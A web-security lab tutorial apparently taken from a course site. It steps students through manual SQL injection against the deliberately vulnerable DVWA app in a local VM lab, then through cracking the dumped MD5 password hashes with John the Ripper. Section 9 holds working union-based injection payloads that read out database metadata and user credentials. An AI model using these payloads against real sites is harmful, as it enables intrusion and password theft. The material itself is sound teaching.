Vulnerable Web App (DVWA):
Lesson 6)
{ Manual SQL Injection,
John the Ripper }
Section 0. Background
Information |
- What is Damn Vulnerable Web App (DVWA)?
- Damn Vulnerable Web App (DVWA) is a PHP/MySQL
web application that is damn vulnerable.
- Its main goals are to be an aid for security
professionals to test their skills and tools in a legal environment, help
web developers better understand the processes of securing web applications
and aid teachers/students to teach/learn web application security in a class
room environment.
- What is a SQL Injection?
- SQL injection (also known as SQL fishing)
is a technique often used to attack data driven applications.
- This is done by including portions of SQL
statements in an entry field in an attempt to get the website to pass a
newly formed rogue SQL command to the database (e.g., dump the database
contents to the attacker). SQL injection is a code injection technique
that exploits a security vulnerability in an application's software.
- The vulnerability happens when user input
is either incorrectly filtered for string literal escape characters
embedded in SQL statements or user input is not strongly typed and
unexpectedly executed. SQL injection is mostly known as an attack vector
for websites but can be used to attack any type of SQL database.
- What is SQL Injection Harvesting?
- SQL Injection Harvesting is where a malicious
user supplies SQL statements to render sensitive data such as usernames,
passwords, database tables, and more.
- Pre-Requisite Lab
- In this lab we will do the following:
- We use inject always true SQL statements
into the SQL Injection User ID field with security set to low.
- We will obtain the username and raw-MD5
password contents from the users table.
- We will use John the Ripper to crack the
raw-MD5 password HASH for each user.
- Legal Disclaimer
- As a condition of your use of this Web
site, you warrant to computersecuritystudent.com that you will not use
this Web site for any purpose that is unlawful or
that is prohibited by these terms, conditions, and notices.
- In accordance with UCC § 2-316, this
product is provided with "no warranties, either expressed or implied." The
information contained is provided "as-is", with "no guarantee of
- In addition, this is a teaching website
that does not condone malicious behavior of
any kind.
- Your are on notice, that continuing
and/or using this lab outside your "own" test environment
is considered
malicious and is against the law.
- © 2012 No content replication of any
kind is allowed without express written permission.
Section 1:
Configure Fedora14 Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare --> VMWare Player
- Edit fedora14 Virtual Machine Settings
- Instructions:
- Highlight fedora14
- Click Edit virtual machine settings

- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Click on the OK Button.

Section 2:
Login to Fedora14 |
- Start Fedora14 VM Instance
- Instructions:
- Start Up VMWare Player
- Select Fedora14
- Play virtual machine

- Login to Fedora14
- Instructions:
- Login: student
- Password: <whatever you set
it to>.

Section 3:
Open Console Terminal and Retrieve IP Address |
- Start a Terminal Console
- Instructions:
- Applications --> Terminal

- Switch user to root
- Instructions:
- su - root
- <Whatever you set the root password to>

- Get IP Address
- Instructions:
- ifconfig -a
- Notes(FYI):
- As indicated below, my IP address is
- Please record your IP address.
Section 4: Configure BackTrack Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare -->
VMWare Player
- Edit BackTrack Virtual Machine Settings
- Instructions:
- Highlight BackTrack5R1
- Click Edit virtual machine settings

- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Do not Click on the OK Button.

Section 5: Login to BackTrack |
- Start BackTrack VM Instance
- Instructions:
- Start Up VMWare Player
- Select BackTrack5R1
- Play virtual machine

- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed
it to>.

- Bring up the GNOME
- Instructions:
- Type startx

Section 6: Open Console Terminal and Retrieve IP Address |
- Open a console terminal
- Instructions:
- Click on the console terminal
- Get IP Address
- Instructions:
- ifconfig -a
- Notes(FYI):
- As indicated below, my IP address is
- Please record your IP address.
- Start Firefox
- Instructions:
- Click on Firefox

- Login to DVWA
- Instructions:
- Start up Firefox on BackTrack
- Place
in the address bar.
- Replace with
Fedora's IP address obtained in (Section 3, Step 3).
- Login: admin
- Password: password
- Click on Login

Section 8: Set Security Level |
- Set DVWA Security Level
- Instructions:
- Click on DVWA Security, in the left
hand menu.
- Select "low"
- Click Submit
Section 9:
Manual SQL Injection |
- SQL Injection Menu
- Instructions:
- Select "SQL Injection" from the left
navigation menu.

- Basic Injection
- Instructions:
- Input "1" into the text box.
- Click Submit.
- Note, webpage/code is supposed to
print ID, First name, and Surname to the screen.
- Notes(FYI):
- Below is the PHP select statement that we
will be exploiting, specifically $id.
- $getid = "SELECT first_name,
last_name FROM users WHERE user_id = '$id'";
- Always True Scenario
- Instructions:
- Input the below text into the User ID
Textbox (See Picture).
- Click Submit
- Notes(FYI):
- In this scenario, we are saying display
all record that are false and all records that are true.
- %' - Will probably not be
equal to anything, and will be false.
- '0'='0' - Is equal to true, because
0 will always equal 0.
- Database Statement
- mysql> SELECT first_name,
last_name FROM users WHERE user_id = '%'
or '0'='0';
- Display Database Version
- Instructions:
- Input the below text into the User ID
Textbox (See Picture).
- %' or 0=0 union select null,
version() #
- Click Submit
- Notes(FYI):
- Notice in the last displayed line,
5.1.60 is displayed in the surname.
- This is the version of the mysql
- Display Database User
- Instructions:
- Input the below text into the User ID
Textbox (See Picture).
- %' or 0=0 union select null, user()
- Notes(FYI):
- Notice in the last displayed line,
root@localhost is displayed in the surname.
- This is the name of the database user
that executed the behind the scenes PHP code.
- Display Database Name
- Instructions:
- Input the below text into the User ID
Textbox (See Picture).
- %' or 0=0 union select null,
database() #
- Notes(FYI):
- Notice in the last displayed line, dvwa
is displayed in the surname.
- This is the name of the database.
- Display all tables in information_schema
- Instructions:
- Input the below text into the User ID
Textbox (See Picture).
- %' and 1=0 union select
null, table_name from information_schema.tables #
- Click Submit
- Notes(FYI):
- Now we are displaying all the tables in the
information_schema database.
- The INFORMATION_SCHEMA is the information
database, the place that stores information about all the other
databases that the MySQL server maintains.
- Display all the user tables in
- Instructions:
- Input the below text into the User ID
Textbox (See Picture).
- %' and 1=0 union select
null, table_name from information_schema.tables where table_name
like 'user%'#
- Click Submit
- Notes(FYI):
- Now we are displaying all the tables that
start with the prefix "user" in the information_schema database.

- Display all the columns fields in the
information_schema user table
- Instructions:
- Input the below text into the User ID
Textbox (See Picture).
- %' and 1=0 union select null,
concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #
- Click Submit
- Notes(FYI):
- Now we are displaying all the columns in
the users table.
- Notice there are a user_id, first_name,
last_name, user and Password

- Display all the columns field contents
in the information_schema user table
- Instructions:
- Input the below text into the User ID
Textbox (See Picture).
- %' and 1=0 union select null,
concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from
users #
- Click Submit
- Notes(FYI):
- Now we have successfully displayed all the
necessary authentication information into this database.

Section 10: Create Password Hash File |
- Create Password Hash File
- Instructions:
- Highlight both admin and the password
- Right Click
- Copy
- Open Notepad
- Instructions:
- Applications --> Wine --> Programs -->
Accessories --> Notepad
- Paste in Notepad
- Instructions:
- Edit --> Paste
- Format in Notepad
- Instructions:
- Place a ":" immediately after admin
- Make sure your cursor is immediately
after the ":" and hit the delete button.
- Now you should see the user admin and
the password hash separated by a ":" on the same line.
- Cut the username and password
combinations for gordonb, 1337, pablo, and smitty from (Section 11,
Step 1) and paste in this file as well.
- Save in Notepad
- Instructions:
- Navigate to --> /pentest/passwords/john
- Name the file name -->
- Click Save
Section 11:
Proof of Lab Using John the Ripper |
- Proof of Lab
- Instructions:
- Bring up a new terminal, see (Section
7, Step 1)
- cd /pentest/passwords/john
- ./john --format=raw-MD5
- date
- echo "Your Name"
- Replace the string "Your Name" with
your actual name.
- e.g., echo "John Gray"
Proof of Lab Instructions:
- Do a <PrtScn>
- Paste into a word document
- Upload to Moodle

